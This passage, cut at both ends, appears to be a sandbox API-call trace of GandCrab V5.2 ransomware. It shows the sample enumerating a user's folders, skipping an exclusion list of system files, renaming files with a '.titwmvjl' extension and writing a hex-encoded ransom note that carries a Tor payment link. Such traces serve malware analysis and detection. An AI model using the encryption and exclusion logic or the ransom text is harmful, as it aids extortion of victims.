param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a09d2ca4deb61a.lock") returned 55 [0095.079] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\searches\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0095.080] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.080] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.080] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\") returned 31 [0095.080] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\*" [0095.080] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503278 [0095.080] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.080] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.081] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.081] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.081] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.081] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.081] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.081] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a09d2ca4deb61a.lock" [0095.081] lstrlenW (lpString=".titwmvjl") returned 9 [0095.081] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a09d2ca4deb61a.lock") returned 55 [0095.081] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.081] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 64 [0095.081] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a09d2ca4deb61a.lock") returned 55 [0095.081] lstrlenW (lpString=".lock") returned 5 [0095.081] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.082] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.082] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.082] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.082] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.082] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0095.082] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0095.082] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini" [0095.082] lstrlenW (lpString=".titwmvjl") returned 9 [0095.082] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned 42 [0095.082] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.082] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini.titwmvjl") returned 51 [0095.082] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned 42 [0095.082] lstrlenW (lpString=".ini") returned 4 [0095.082] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.082] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0095.083] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0095.083] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.083] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned 42 [0095.083] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned 42 [0095.083] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0095.083] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.083] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.083] lstrcmpW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0095.083] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0095.083] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms" [0095.083] lstrlenW (lpString=".titwmvjl") returned 9 [0095.083] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned 51 [0095.083] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.083] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms.titwmvjl") returned 60 [0095.083] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned 51 [0095.083] lstrlenW (lpString=".search-ms") returned 10 [0095.083] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.084] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".search-ms ") returned 11 [0095.084] lstrcmpiW (lpString1=".search-ms", lpString2=".titwmvjl") returned -1 [0095.084] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.084] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned 51 [0095.084] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned 51 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="desktop.ini") returned 1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="autorun.inf") returned 1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="iconcache.db") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootsect.bak") returned 1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot.ini") returned 1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat.log") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="thumbs.db") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="KRAB-DECRYPT.html") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="CRAB-DECRYPT.html") returned 1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntldr") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="NTDETECT.COM") returned -1 [0095.084] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Bootfont.bin") returned 1 [0095.084] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned 51 [0095.084] lstrlenW (lpString=".search-ms") returned 10 [0095.084] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.085] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".search-ms ") returned 11 [0095.085] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.085] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.085] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0095.085] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.086] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.086] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.086] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0095.086] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0095.086] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms" [0095.086] lstrlenW (lpString=".titwmvjl") returned 9 [0095.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned 58 [0095.086] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.086] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms.titwmvjl") returned 67 [0095.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned 58 [0095.086] lstrlenW (lpString=".search-ms") returned 10 [0095.086] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.086] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".search-ms ") returned 11 [0095.086] lstrcmpiW (lpString1=".search-ms", lpString2=".titwmvjl") returned -1 [0095.086] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.087] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned 58 [0095.087] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned 58 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="desktop.ini") returned 1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="autorun.inf") returned 1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="iconcache.db") returned 1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootsect.bak") returned 1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot.ini") returned 1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat.log") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="thumbs.db") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="KRAB-DECRYPT.html") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="CRAB-DECRYPT.html") returned 1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntldr") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="NTDETECT.COM") returned -1 [0095.087] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Bootfont.bin") returned 1 [0095.087] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned 58 [0095.087] lstrlenW (lpString=".search-ms") returned 10 [0095.087] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.087] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".search-ms ") returned 11 [0095.087] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.088] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.088] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0095.088] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.088] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.088] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.088] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0095.088] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0095.088] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\TITWMVJL-DECRYPT.txt" [0095.088] lstrlenW (lpString=".titwmvjl") returned 9 [0095.088] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\TITWMVJL-DECRYPT.txt") returned 51 [0095.088] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.089] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 60 [0095.089] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\TITWMVJL-DECRYPT.txt") returned 51 [0095.089] lstrlenW (lpString=".txt") returned 4 [0095.089] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.089] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0095.089] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0095.089] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.089] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\TITWMVJL-DECRYPT.txt") returned 51 [0095.089] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\TITWMVJL-DECRYPT.txt") returned 51 [0095.089] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0095.089] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0095.089] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0095.089] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0095.090] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0095.090] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0095.090] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0095.090] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0095.090] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.090] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0095.090] FindClose (in: hFindFile=0x503278 | out: hFindFile=0x503278) returned 1 [0095.090] CloseHandle (hObject=0x230) returned 1 [0095.090] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0095.090] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0095.091] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0095.091] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="SendTo" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo") returned="C:\\Users\\CIiHmnxMn6Ps\\SendTo" [0095.091] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\") returned="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\" [0095.091] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.091] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.091] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.091] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.091] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.091] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.091] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.092] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.092] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.092] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.092] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.092] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\\\TITWMVJL-DECRYPT.txt") returned 50 [0095.092] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\sendto\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0095.096] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\